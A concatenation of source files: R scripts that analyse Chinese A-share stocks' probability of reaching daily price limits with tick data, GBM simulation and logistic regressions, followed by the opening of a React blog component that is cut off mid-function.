## Format and print Prac_Vs_Theo
Prac_Vs_Theo <- Prac_Vs_Theo %>%
mutate(Direction = factor(Direction, levels = c("ALL", "UP", "DOWN"),
labels = c("All", "Upper", "Lower"))) %>%
arrange(Direction) %>%
rename(`Prac. Prob.` = Prob_Prac,
`Theo. Prob.` = Prob_Theo,
Diff. = Diff,
`T Stat.` = t.stat,
`P Value` = p.value) %>%
mutate_at(vars(`Prac. Prob.`:Diff.), formattable::percent, digits = 1L)
Prac_Vs_Theo
# Compare at different thresholds ----
# Practical probabilities
probs_prac <- list(
UP = apply(Valid_Indices$UP, 2, function(x)
mean(Stock_Daily_Data3$UP$reach_prac[x])),
DOWN = apply(Valid_Indices$DOWN, 2, function(x)
mean(Stock_Daily_Data3$DOWN$reach_prac[x]))
)
# Theoretical probabilities
Probs_Theo_bak <- Probs_Theo
Probs_Theo$UP[!Valid_Indices$UP] <- NA
Probs_Theo$DOWN[!Valid_Indices$DOWN] <- NA
probs_theo <- Probs_Theo %>%
lapply(function(x) apply(x, 2, mean, na.rm = TRUE))
# exploratory plots
plot(probs_prac$UP, type = "b", col = "red")
lines(probs_theo$UP, type = "b", col = "cyan")
plot(probs_prac$DOWN, type = "b", col = "red")
lines(probs_theo$DOWN, type = "b", col = "cyan")
# explanatory plot
Diff_Thre <- list(prob_prac = probs_prac, prob_theo = probs_theo) %>%
lapply(simplify2array) %>%
lapply(as_tibble) %>%
lapply(mutate, threshold = thresholds) %>%
bind_rows(.id = "prob_type") %>%
mutate(ALL = (UP + DOWN) / 2) %>%
gather(direction, prob, UP, DOWN, ALL) %>%
mutate(direction = factor(direction,
levels = c("ALL", "UP", "DOWN"),
labels = c("All", "Upper", "Lower")))
p_Diff_Thre <- Diff_Thre %>%
ggplot(aes(x = threshold, y = prob, col = prob_type)) +
geom_line(alpha = 0.5) +
geom_point(size = 2) +
scale_x_continuous("Starting threshold",
breaks = thresholds,
labels = scales::percent_format(accuracy = .1)) +
scale_y_continuous("Probability to reach price limit",
limits = c(NA, 1),
labels = scales::percent) +
scale_colour_discrete("Type of probablity", labels = c("Practical", "Theoretical")) +
facet_wrap(~ direction, ncol = 1L)
## Print p_Diff_Thre
p_Diff_Thre
# Hard to value ----
# Construct the various hard-to-value measures
Hard_Data <- Stock_Daily_Data %>%
select(S_INFO_WINDCODE, TRADE_DT, S_DQ_AMOUNT, S_VAL_MV, S_VAL_PE_TTM,
S_DQ_FREETURNOVER, S_PRICE_DIV_DPS) %>%
filter(TRADE_DT >= format(start_date %>% ymd() %m-% months(6), "%Y%m%d"),
TRADE_DT <= end_date) %>%
  # Replace zeros on no-trade days with NA, otherwise log() would produce -Inf
mutate_at(vars(S_DQ_AMOUNT, S_DQ_FREETURNOVER),
replace_certain, pattern = 0, replacement = NA) %>%
  # Take logs
mutate_at(vars(S_DQ_AMOUNT:S_PRICE_DIV_DPS), log) %>%
  # Average over the previous 60 trading days
group_by(S_INFO_WINDCODE) %>%
mutate_at(vars(S_DQ_AMOUNT:S_PRICE_DIV_DPS), rollapply,
width = list(-60:-1), FUN = mean, na.rm = TRUE, fill = NA) %>%
ungroup() %>%
  # Keep only the sample period
filter(TRADE_DT >= start_date) %>%
  # Flag non-dividend payers based on whether the dividend yield is missing
mutate(NON_DIV = is.na(S_PRICE_DIV_DPS))
# # Time since listing
# conn <- wind_sql_connect()
# Hard_Data <- tbl(conn, "AShareDescription") %>%
# select(S_INFO_WINDCODE, S_INFO_LISTDATE) %>%
# collect() %>%
# left_join(Hard_Data, .) %>%
# mutate(AGE_LIST = ymd(TRADE_DT) - ymd(S_INFO_LISTDATE))
# Hard_Data <- tbl(conn, "AShareIntroduction") %>%
# select(S_INFO_WINDCODE, S_INFO_FOUNDDATE) %>%
# collect() %>%
# left_join(Hard_Data, .) %>%
# mutate(AGE_FOUND = ymd(TRADE_DT) - ymd(S_INFO_FOUNDDATE))
# DBI::dbDisconnect(conn)
# # Group the hard-to-value indicators into quintiles on each trading day
# Hard_Data <- Hard_Data %>%
# group_by(TRADE_DT) %>%
# mutate_at(vars(S_DQ_AMOUNT:S_PRICE_DIV_DPS), divide, n_group = 5L) %>%
# ungroup()
# Merge in the hard-to-value data
Core_Data_Plus_Hard <- Core_Data %>%
lapply(left_join, Hard_Data)
# Function to test a hard-to-value grouping variable
test_group_var <- function(group, data = Core_Data_Plus_Hard, direction = "ALL") {
group <- sym(group)
data[[direction]] %>%
group_by(!! group) %>%
summarise(Prob_Prac = mean(reach_prac),
Prob_Theo = mean(prob_theo),
Diff = Prob_Prac - Prob_Theo,
t.stat = t.test(reach_prac, prob_theo, paired = TRUE)$statistic,
p.value = t.test(reach_prac, prob_theo, paired = TRUE)$p.value,
N = n()) %>%
return()
}
# Grouping variables
hard_vars <- Hard_Data %>%
select(S_DQ_AMOUNT:NON_DIV) %>%
names()
# # Grouping results
# hard_vars %>%
# lapply(test_group_var)
# glm results
glmfit_S_VAL_MV1 <- glm(
reach_prac ~ prob_theo + S_VAL_MV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_VAL_MV2 <- glm(
reach_prac ~ prob_theo + Direction + S_VAL_MV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_VAL_PE_TTM1 <- glm(
reach_prac ~ prob_theo + S_VAL_PE_TTM,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_VAL_PE_TTM2 <- glm(
reach_prac ~ prob_theo + Direction + S_VAL_PE_TTM,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_NON_DIV1 <- glm(
reach_prac ~ prob_theo + NON_DIV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_NON_DIV2 <- glm(
reach_prac ~ prob_theo + Direction + NON_DIV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_PRICE_DIV_DPS1 <- glm(
reach_prac ~ prob_theo + S_PRICE_DIV_DPS,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_PRICE_DIV_DPS2 <- glm(
reach_prac ~ prob_theo + Direction + S_PRICE_DIV_DPS,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
## Generate the regression tables (change type to "latex" for the paper)
stargazer(glmfit_S_VAL_MV1, glmfit_S_VAL_MV2, glmfit_S_VAL_PE_TTM1, glmfit_S_VAL_PE_TTM2,
type = "text",
title = "Excess Probability Reaching Price Limit with Hard-to-Value Firms",
table.placement = "H",
dep.var.labels = "Reaching Price Limit",
covariate.labels = c("Theoretical Probability", "Upper", "Market Value", "Price to Earnings"),
header = FALSE)
stargazer(glmfit_NON_DIV1, glmfit_NON_DIV2, glmfit_S_PRICE_DIV_DPS1, glmfit_S_PRICE_DIV_DPS2,
type = "text",
title = "Excess Probability Reaching Price Limit with Hard-to-Value Firms (Continued)",
table.placement = "H",
dep.var.labels = "Reaching Price Limit",
covariate.labels = c("Theoretical Probability", "Upper", "None-Divident", "Price to Dividend"),
header = FALSE)
# Trading activity ----
glmfit_S_DQ_AMOUNT1 <- glm(
reach_prac ~ prob_theo + S_DQ_AMOUNT,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_DQ_AMOUNT2 <- glm(
reach_prac ~ prob_theo + Direction + S_DQ_AMOUNT,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_DQ_FREETURNOVER1 <- glm(
reach_prac ~ prob_theo + S_DQ_FREETURNOVER,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_DQ_FREETURNOVER2 <- glm(
reach_prac ~ prob_theo + Direction + S_DQ_FREETURNOVER,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
## Generate the regression tables
stargazer(glmfit_S_DQ_AMOUNT1, glmfit_S_DQ_AMOUNT2,
glmfit_S_DQ_FREETURNOVER1, glmfit_S_DQ_FREETURNOVER2,
type = "text",
title = "Excess Probability Reaching Price Limit with Active-Trading Firms",
table.placement = "H",
dep.var.labels = "Reaching Price Limit",
covariate.labels = c("Theoretical Probability", "Upper", "Trading Volume", "Turnover"),
header = FALSE)
# # Investor sentiment ----
# # Read the ISI data
# ISI_Data <- read_csmar_data("data/ISI综合情绪指数表/QX_ISI.xls") %>%
# arrange(SgnMonth) %>%
# mutate(YEARMON = str_remove(SgnMonth, "-")) %>%
# filter(YEARMON >= "201410", YEARMON <= "201810") %>%
# mutate(ISI = divide(ISI, n_group = 3L)) %>%
# mutate(ISI = factor(ISI, levels = 3:1, labels = c("High", "Medium", "Low"))) %>%
# select(YEARMON, ISI)
#
# # Merge in the ISI data
# Core_Data_Plus_Hard <- Core_Data_Plus_Hard %>%
# lapply(mutate, YEARMON = substr(TRADE_DT, 1L, 6L)) %>%
# lapply(left_join, ISI_Data)
#
# # ISI results
# test_group_var("ISI", direction = "UP")
# test_group_var("ISI", direction = "DOWN")
# test_group_var("ISI")
#
# # glm
# glm(
# reach_prac ~ prob_theo + ISI,
# family = binomial,
# data = Core_Data_Plus_Hard$DOWN
# ) %>%
# summary()
#
# # CICSI
# CICSI_Data <- read_csmar_data("data/CICSI综合情绪指数表/QX_CICSI.xls") %>%
# arrange(SgnMonth) %>%
# mutate(YEARMON = str_remove(SgnMonth, "-")) %>%
# filter(YEARMON >= "201410", YEARMON <= "201810") %>%
# mutate(CICSI = divide(CICSI, n_group = 3L)) %>%
# mutate(CICSI = factor(CICSI, levels = 3:1, labels = c("High", "Medium", "Low"))) %>%
# select(YEARMON, CICSI)
# Core_Data_Plus_Hard <- Core_Data_Plus_Hard %>%
# lapply(left_join, CICSI_Data)
# test_group_var("CICSI", direction = "UP")
# test_group_var("CICSI", direction = "DOWN")
# test_group_var("CICSI")
# glm(
# reach_prac ~ prob_theo + CICSI,
# family = binomial,
# data = Core_Data_Plus_Hard$DOWN
# ) %>%
# summary()
#
#
# # Market state ----
# load("~/Documents/Stock-Data/D-Index-Daily-Data.RData")
# Market_State_Data <- Index_Daily_Data %>%
# filter(S_INFO_WINDCODE == "000001.SH") %>%
# filter(TRADE_DT >= "20140101") %>%
# transmute(TRADE_DT, Market_State = rollapply(S_DQ_PCTCHANGE, width = list(-120:-1), FUN = mean, na.rm = TRUE, fill = NA)) %>%
# mutate(Market_State = Market_State >= 0) %>%
# filter(TRADE_DT >= start_date)
# Core_Data_Plus_Hard <- Core_Data_Plus_Hard %>%
# lapply(left_join, Market_State_Data)
# glm(
# reach_prac ~ prob_theo + Market_State,
# family = binomial,
# data = Core_Data_Plus_Hard$DOWN
# ) %>%
# summary()
# Trigger ----
# Split the sample into two groups by whether the threshold was triggered during continuous trading
Trigger_Data <- list(
UP = Stock_Daily_Data3$UP %>%
mutate(prob_theo = Probs_Theo_bak$UP[, 1]) %>%
mutate(Trigger = Nonopen_Valid_Indices$UP[, 1]) %>%
filter(Probs_Theo_Valid_Indices$UP[, 1]),
DOWN = Stock_Daily_Data3$DOWN %>%
mutate(prob_theo = Probs_Theo_bak$DOWN[, 1]) %>%
mutate(Trigger = Nonopen_Valid_Indices$DOWN[, 1]) %>%
filter(Probs_Theo_Valid_Indices$DOWN[, 1])
)
Trigger_Data$ALL <- bind_rows(Trigger_Data, .id = "Direction")
## Output the Trigger results
Trigger_Results_Table <- test_group_var("Trigger", data = Trigger_Data) %>%
mutate(Trigger = factor(Trigger, labels = c("No", "Yes"))) %>%
rename(`Triggered during Trading` = Trigger,
`Prac. Prob.` = Prob_Prac,
`Theo. Prob.` = Prob_Theo,
Diff. = Diff,
`T Stat.` = t.stat,
`P Value` = p.value) %>%
mutate_at(vars(`Prac. Prob.`:Diff.), formattable::percent, digits = 1L)
Trigger_Results_Table
# Institutional ownership ----
# Download the institutional holdings data
conn <- wind_sql_connect()
AShareinstHolderDerData <- tbl(conn, "AShareinstHolderDerData") %>%
select(S_INFO_WINDCODE, REPORT_PERIOD, S_HOLDER_PCT) %>%
collect()
DBI::dbDisconnect(conn)
# Aggregate to total institutional ownership per stock
Inst_Hold_Data <- AShareinstHolderDerData %>%
  # Sum holdings across institutions
group_by(S_INFO_WINDCODE, REPORT_PERIOD) %>%
summarise(INST_HOLD = sum(S_HOLDER_PCT, na.rm = TRUE)) %>%
ungroup() %>%
  # Group into quintiles
group_by(REPORT_PERIOD) %>%
mutate(INST_HOLD = divide(INST_HOLD, n_group = 5)) %>%
ungroup() %>%
  # Convert the report period to quarterly dates
mutate(REPORT_PERIOD = as.yearqtr(REPORT_PERIOD, format = "%Y%m%d"))
rm(AShareinstHolderDerData)
# Merge in the institutional ownership data
Core_Data_Plus_Inst <- Core_Data %>%
lapply(mutate, REPORT_PERIOD = as.yearqtr(TRADE_DT, format = "%Y%m%d") - 0.25) %>%
lapply(left_join, Inst_Hold_Data)
## Institutional ownership results
Inst_Results_Table <- test_group_var("INST_HOLD", data = Core_Data_Plus_Inst) %>%
na.omit() %>%
rename(`Inst. Hold.` = INST_HOLD,
`Prac. Prob.` = Prob_Prac,
`Theo. Prob.` = Prob_Theo,
Diff. = Diff,
`T Stat.` = t.stat,
`P Value` = p.value) %>%
mutate_at(vars(`Prac. Prob.`:Diff.), formattable::percent, digits = 1L)
Inst_Results_Table
# # glm
# glm(
# reach_prac ~ prob_theo + Direction + INST_HOLD,
# family = binomial,
# data = Core_Data_Plus_Inst$ALL
# ) %>%
# summary()
# Save data ----
# save.image("data/02-D-Analysis.RData")
save(start_date,
end_date,
Stock_Daily_Data3,
Extreme_Prop,
Valid_Thre_Count,
Prac_Vs_Theo,
Trigger_Results_Table,
Inst_Results_Table,
list = c(grep("^glmfit", ls(), value = TRUE),
grep("^p_", ls(), value = TRUE)),
file = "data/02-D-For-Rmd-Paper.RData")
<file_sep>library(tidyverse)
library(lubridate)
library(zoo)
library(parallel)
library(cnquant)
# Initialize ----
# Path to the basic stock data
# path_to_basic <- "~/Documents/Stock-Data"
path_to_basic <- "~/einzbern/Stock-Data"
# Load the basic stock data
load(paste0(path_to_basic, "/D-Stock-Daily-Data.RData"))
# The final sample period matches the period for which tick data are available
start_date <- "20141010" # Tick数据开始的时间
end_date <- "20181010" # Tick数据结束的时间
# Number of cores for parallel computation
ncl <- 20L
socket_type <- "PSOCK"
# Which boards to include
# board_codes <- c("000", "001", "600", "601", "603") # only主板
board_codes <- c("000", "001", "600", "601", "603", "002", "300") # 全部
# Paths to the main-board, SME-board and GEM data, respectively
# path_to_mainboard <- "/mnt/sdc2/WIND_DATA/ID_BT_SHARES_A"
path_to_mainboard <- "G:/WIND_DATA/ID_BT_SHARES_A"
path_to_sme <- "H:/WIND_DATA/ID_BT_SHARES_S"
path_to_ge <- "H:/WIND_DATA/ID_BT_SHARES_G"
# Price-change thresholds
threshold <- 0.09
thresholds <- seq(0.09, 0.099, by = 0.001)
# # Keep a copy of the initial data (the 0# objects) ----
# # Note: this copy is filtered directly to the final sample period, whereas the other dataset starts earlier because the rolling estimation needs a longer history
# Stock_Daily_Data0 <- Stock_Daily_Data %>%
#   # Required variables
# select(S_INFO_WINDCODE:S_DQ_CLOSE, S_DQ_PCTCHANGE, S_DQ_TRADESTATUS, UP_DOWN_LIMIT_STATUS, ST) %>%
#   # Sample period
# filter(TRADE_DT >= start_date) %>%
# filter(TRADE_DT <= end_date) %>%
#   # Which boards to include
# filter(substr(S_INFO_WINDCODE, 1L, 3L) %in% board_codes)
#
# Stock_Daily_Data01 <- Stock_Daily_Data0 %>%
#   # Not ST
# filter(!ST) %>%
#   # Normal trading status
# filter(S_DQ_TRADESTATUS %in% c("交易", "DR", "XD", "XR")) %>%
#   # Drop problematic observations where the high exceeds the up-limit price; after 20141009 the only case is 000520, which resumed trading on 20151218 and jumped from about 2 to 20 yuan
# filter(S_DQ_HIGH <= round(S_DQ_PRECLOSE * 1.1 + .Machine$double.eps ^ 0.5, 2))
# First screen: keep the required variables and time window ----
Stock_Daily_Data <- Stock_Daily_Data %>%
  # Required variables
select(S_INFO_WINDCODE:S_DQ_CLOSE, S_DQ_PCTCHANGE, S_DQ_TRADESTATUS,
UP_DOWN_LIMIT_STATUS, ST) %>%
  # Sample period: start earlier than the tick sample (13 months here) because of the rolling estimation window
filter(TRADE_DT >= format(start_date %>% ymd() %m-% months(13), "%Y%m%d")) %>%
filter(TRADE_DT <= end_date) %>%
  # Which boards to include
filter(substr(S_INFO_WINDCODE, 1L, 3L) %in% board_codes)
# Construct the required variables ----
Stock_Daily_Data <- Stock_Daily_Data %>%
  # Compute the up/down threshold and limit prices, and whether each is reached
mutate(UP_LIMIT = round(S_DQ_PRECLOSE * 1.1 + .Machine$double.eps ^ 0.5, 2),
DOWN_LIMIT = round(S_DQ_PRECLOSE * 0.9 + .Machine$double.eps ^ 0.5, 2),
UP_THRESHOLD = S_DQ_PRECLOSE * (1 + threshold),
DOWN_THRESHOLD = S_DQ_PRECLOSE * (1 - threshold),
REACH_UP_LIMIT = S_DQ_HIGH == UP_LIMIT,
REACH_DOWN_LIMIT = S_DQ_LOW == DOWN_LIMIT,
REACH_UP_THRESHOLD = S_DQ_HIGH >= UP_THRESHOLD,
REACH_DOWN_THRESHOLD = S_DQ_LOW <= DOWN_THRESHOLD)
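# Worked example with illustrative numbers: if S_DQ_PRECLOSE = 10.00 and threshold = 0.09, then
# UP_LIMIT = round(10.00 * 1.1, 2) = 11.00, UP_THRESHOLD = 10.90, DOWN_LIMIT = 9.00 and
# DOWN_THRESHOLD = 9.10; a day with S_DQ_HIGH = 10.95 reaches the up threshold but not the limit.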
# Rolling estimation of the daily GBM parameters mu and sigma from daily data ----
# After estimation, trim back to the standard sample period
# Function to estimate the mean and standard deviation
mu_sigma <- function(x) c(mean(x, na.rm = TRUE), sd(x, na.rm = TRUE))
system.time(
Stock_Daily_Data <- Stock_Daily_Data %>%
    # Compute log returns
mutate(Ri = log(1 + S_DQ_PCTCHANGE / 100)) %>%
    # Rolling-window estimation of the GBM parameters mu and sigma from the mean and sd of log returns
group_by(S_INFO_WINDCODE) %>%
do(data.frame(
.,
rollapply(.$Ri, list(-260:-21), mu_sigma, fill = NA),
stringsAsFactors = FALSE
)) %>%
ungroup() %>%
select(-Ri, -starts_with("rollapply")) %>%
rename(mu = X1, sigma = X2) %>%
mutate(mu = mu + 1 / 2 * sigma ^ 2) %>%
    # After the rolling computation, keep only the period with tick data
filter(TRADE_DT >= start_date)
)
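# Why mu is shifted by sigma^2 / 2: for a GBM dS = mu * S * dt + sigma * S * dW, daily log returns
# are normal with mean mu - sigma^2 / 2, so the drift implied by the average log return is recovered
# by adding sigma^2 / 2 back. Illustration with made-up numbers: if mean(Ri) = 0.0005 and
# sigma = 0.02, then mu = 0.0005 + 0.5 * 0.02^2 = 0.0007.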
# # Add the path to the previous day's K-line data ----
# Stock_Daily_Data1 <- Stock_Daily_Data %>%
# mutate(kline_path_lag1 = case_when(
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("000", "001") ~
# paste0(path_to_mainboard, "/KLine/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("600", "601", "603") ~
# paste0(path_to_mainboard, "/KLine/SH/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("002") ~
# paste0(path_to_sme, "/KLine/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("300") ~
# paste0(path_to_ge, "/KLine/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv")
# )) %>%
#   # Similarly, the parameters could be estimated from the previous day's intraday data; build the lagged path here (before filtering) because the date needs to be lagged
# group_by(S_INFO_WINDCODE) %>%
# mutate(kline_path_lag1 = lag(kline_path_lag1)) %>%
# ungroup()
Stock_Daily_Data1 <- Stock_Daily_Data
# Second screen: drop ST stocks and other cases that break the continuity of a stock's time series ----
Stock_Daily_Data1 <- Stock_Daily_Data1 %>%
  # Not ST
filter(!ST) %>%
  # Normal trading status
filter(S_DQ_TRADESTATUS %in% c("交易", "DR", "XD", "XR")) %>%
  # Drop problematic observations where the high exceeds the up-limit price; after 20141009 the only case is 000520, which resumed trading on 20151218 and jumped from about 2 to 20 yuan
filter(S_DQ_HIGH <= UP_LIMIT)
# Third screen: keep observations whose maximum absolute move exceeds the threshold (e.g. 9%) ----
Stock_Daily_Data2 <- Stock_Daily_Data1 %>%
  # Keep only trading days that crossed a threshold
filter(REACH_UP_THRESHOLD | REACH_DOWN_THRESHOLD) %>%
  # For up and down separately, drop days that were already past the threshold at the open
filter(!(S_DQ_OPEN == UP_LIMIT & S_DQ_LOW > DOWN_THRESHOLD),
!(S_DQ_OPEN == DOWN_LIMIT & S_DQ_HIGH < UP_THRESHOLD))
# # Estimate the daily parameters mu and sigma from intraday data (an alternative way) ----
# # Function to estimate the daily mu and sigma from the intraday K-line data
# mu_sigma_intraday <- function(path) {
# # path为日内数据文件路径
# tryCatch({
# path %>%
# read_csv(col_types = cols_only(close = col_integer())) %>%
# with(mu_sigma(log(close / lag(close))))
# }, error = function(e) c(NA, NA))
# }
#
# system.time(
# Stock_Daily_Data2 <- Stock_Daily_Data2 %>%
#     # Compute
# data.frame(
# t(sapply(.$kline_path_lag1, mu_sigma_intraday, USE.NAMES = FALSE)),
# stringsAsFactors = FALSE
# ) %>%
# as_tibble() %>%
# select(-kline_path_lag1) %>%
# rename(mu_hf = X1, sigma_hf = X2) %>%
# mutate(sigma_hf = sigma_hf * sqrt(240),
# mu_hf = mu_hf * 240 + 1 / 2 * sigma_hf ^ 2)
# )
# Use tick data to find the time the price first crosses the threshold ----
# Functions that find, in the tick files, the first time a given price is exceeded (run in parallel)
# Add the required variables
Stock_Daily_Data2 <- Stock_Daily_Data2 %>%
  # Build the tick file paths
mutate(tick_path = case_when(
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("000", "001") ~
paste0(path_to_mainboard, "/Tick/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("600", "601", "603") ~
paste0(path_to_mainboard, "/Tick/SH/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("002") ~
paste0(path_to_sme, "/Tick/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("300") ~
paste0(path_to_ge, "/Tick/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv")
))
# Split the dataset into UP and DOWN parts
Stock_Daily_Data3 <- list(
UP = filter(Stock_Daily_Data2, REACH_UP_THRESHOLD),
DOWN = filter(Stock_Daily_Data2, REACH_DOWN_THRESHOLD)
)
# Build the threshold price matrices
Thresholds <- list(
UP = sapply(thresholds,
function(threshold)
as.integer(Stock_Daily_Data3$UP$S_DQ_PRECLOSE * (1 + threshold) * 10000)),
DOWN = sapply(-thresholds,
function(threshold)
as.integer(Stock_Daily_Data3$DOWN$S_DQ_PRECLOSE * (1 + threshold) * 10000))
)
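# Note: the tick files appear to store prices as integers scaled by 10^4 (hence the "* 10000" above;
# e.g. a 10.90 yuan threshold becomes 109000), so the thresholds are put on the same integer scale
# as the tick high/low columns they are compared against below.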
# Functions that find, in a tick file, the time each threshold is first crossed
# Input is a row index; output is an integer vector (one element per threshold)
match_time_up <- function(index) {
tryCatch({
Stock_Daily_Data3$UP$tick_path[index] %>%
read_csv(col_types = cols_only(time = col_integer(),
high = col_integer())) %>%
with(time[sapply(Thresholds$UP[index, ], function(threshold) detect_index(high, ~ . >= threshold)) %>% replace_certain(0L, NA_integer_)])
}, error = function(e) rep.int(NA_integer_, length(thresholds)))
}
match_time_down <- function(index) {
tryCatch({
Stock_Daily_Data3$DOWN$tick_path[index] %>%
read_csv(col_types = cols_only(time = col_integer(),
low = col_integer())) %>%
with(time[sapply(Thresholds$DOWN[index, ], function(threshold) detect_index(low, ~ . > 0 & . <= threshold)) %>% replace_certain(0L, NA_integer_)])
}, error = function(e) rep.int(NA_integer_, length(thresholds)))
}
# start cluster
cl <- makeCluster(ncl, type = socket_type)
clusterEvalQ(cl, {
library(tidyverse)
library(cnquant)
})
clusterExport(cl, c(
"Stock_Daily_Data3",
"Thresholds",
"thresholds"
))
# Main computation: match the crossing times; the result is an integer matrix
system.time({
t1 <- list(
UP = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$UP)), match_time_up) %>% t(),
DOWN = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$DOWN)), match_time_down) %>% t()
)
})
# Monte Carlo (GBM simulation) probability of reaching the price limit ----
# Function mapping tick times onto [0, 14400] seconds of trading time
ticktime2second <- function(ticktime) {
ticktime = parse_tick_time(ticktime)
ticktime = if_else(ticktime <= parse_time("113000", format = "%H%M%S"),
as.integer(ticktime - parse_time("093000", format = "%H%M%S")),
as.integer(ticktime - parse_time("130000", format = "%H%M%S")) + 7200L)
return(ticktime)
}
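# Sanity check of the mapping implied by the code above: a tick at 09:30:00 maps to 0 s, 10:00:00
# to 1800 s, 11:30:00 and 13:00:00 both map to 7200 s (the lunch break is collapsed), and 15:00:00
# maps to 14400 s, the full 4-hour trading day.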
# Convert times to seconds
t1 <- t1 %>%
lapply(function(x) apply(x, 2, ticktime2second))
# Remaining fraction of the trading day T, derived from t1
T <- t1 %>%
lapply(function(x) (14400L - x) / 14400L)
# Number of simulation steps N (about one step per 3 seconds of remaining time)
N <- t1 %>%
lapply(function(x) round((14400L - x) / 3))
# Thresholds_Mod: for each threshold, the remaining gross return from the threshold price to the limit price
Thresholds_Mod <- list(
UP = Thresholds$UP %>%
apply(2, function(x) Stock_Daily_Data3$UP$UP_LIMIT * 10000 / x),
DOWN = Thresholds$DOWN %>%
apply(2, function(x) Stock_Daily_Data3$DOWN$DOWN_LIMIT * 10000 / x)
)
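# Worked example with illustrative numbers: if the 9% threshold price is 10.90 and UP_LIMIT is
# 11.00, the modified threshold is 11.00 / 10.90, about 1.0092, i.e. the further gross return a
# simulated path (normalised to 1 at the moment the threshold is first hit) must achieve to touch
# the limit.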
# Functions computing the probability of touching the price limit
prob_reach_up <- function(index) {
tryCatch({
trajectories <- Sim.DiffProc::GBM(N = N$UP[index, 1],
M = 1000,
T = T$UP[index, 1],
theta = Stock_Daily_Data3$UP$mu[index],
sigma = Stock_Daily_Data3$UP$sigma[index])
probs <- rep.int(NA, length(thresholds))
for (i in seq_along(probs)) {
probs[i] <- trajectories[time(trajectories) <= T$UP[index, i], ] %>%
apply(2, max) %>%
{mean(. >= Thresholds_Mod$UP[index, i])}
}
probs
}, error = function(e) rep.int(NA, length(thresholds)))
}
prob_reach_down <- function(index) {
tryCatch({
trajectories <- Sim.DiffProc::GBM(N = N$DOWN[index, 1],
M = 1000,
T = T$DOWN[index, 1],
theta = Stock_Daily_Data3$DOWN$mu[index],
sigma = Stock_Daily_Data3$DOWN$sigma[index])
probs <- rep.int(NA, length(thresholds))
for (i in seq_along(probs)) {
probs[i] <- trajectories[time(trajectories) <= T$DOWN[index, i], ] %>%
apply(2, min) %>%
{mean(. <= Thresholds_Mod$DOWN[index, i])}
}
probs
}, error = function(e) rep.int(NA, length(thresholds)))
}
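# In words: for each observation, simulate M = 1000 GBM paths over the remaining fraction T of the
# trading day, using the rolling-window mu and sigma estimated above, and estimate the limit-hit
# probability as the share of paths whose running maximum (minimum for the DOWN side) crosses the
# corresponding Thresholds_Mod ratio within the time remaining for each threshold.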
# clusterExport
clusterExport(cl, c(
"N",
"T",
"Thresholds_Mod"
))
set.seed(4L)
# Main computation: probability of reaching the limit after crossing each threshold; the result is a numeric matrix
system.time({
Probs_Theo <- list(
UP = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$UP)), prob_reach_up) %>% t(),
DOWN = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$DOWN)), prob_reach_down) %>% t()
)
})
# Stop the parallel cluster
stopCluster(cl)
# Save the data
save.image("data/01-D-Sequential-Data.RData")
| ec9c28f33b7a29d2099e2294c284a36114be3891 | ["Markdown", "R"] | 3 | Markdown | ssh352/Magnet-Effect | dd47ae747a3883e7df834faaa5ba684ea1385ac0 | 369f259e5998a39d601547d7e3806a6f6942d5f8 | refs/heads/main |
<file_sep>import React, { useState } from 'react';
import PropTypes from 'prop-types';
import { useSelector, useDispatch } from 'react-redux';
import { deleteBlog, updateBlog, comment } from '../reducers/blogsReducer';
import { setNotification } from '../reducers/notificationReducer';
import blogService from '../services/blogs';
import { useHistory } from 'react-router-dom';
import { useField } from '../hooks';
import {
Container,
Heading,
Link,
Center,
Flex,
Button,
Box,
Input,
UnorderedList,
ListItem,
} from '@chakra-ui/react';
const Blog = ({ blog }) => {
const dispatch = useDispatch();
const user = useSelector(state => state.loggedUser);
const history = useHistory();
const commentInput = useField('text', 'comment');
const giveLike = async () => {
dispatch(updateBlog(blog));
};
const deletePost = async () => {
const confirmed = window.confirm(`Are you sure to delete ${blog.title}?`);
if (!confirmed) return;
try {
blogService.setToken(user.token);
await dispatch(deleteBlog(blog.id));
history.push('/');
dispatch(setNotification(`${blog.title} was removed.`, 'success'));
} catch (exception) {
dispatch(setNotification(exception.response.data.error, 'error'));
}
};
const addComment = async e => {
e.preventDefault();
if (commentInput.input.value.length === 0)
return dispatch(setNotification('Empty comments not allowed', 'error'));
const newComment = {
content: commentInput.input.value,
};
try {
await dispatch(comment(blog.id, newComment));
dispatch(
setNotification(`${commentInput.input.value} was added.`, 'success')
);
} catch (exception) {
dispatch(setNotification(exception.response.data.error, 'error'));
}
commentInput.reset();
};
const showDeleteButton = () => (
<div>
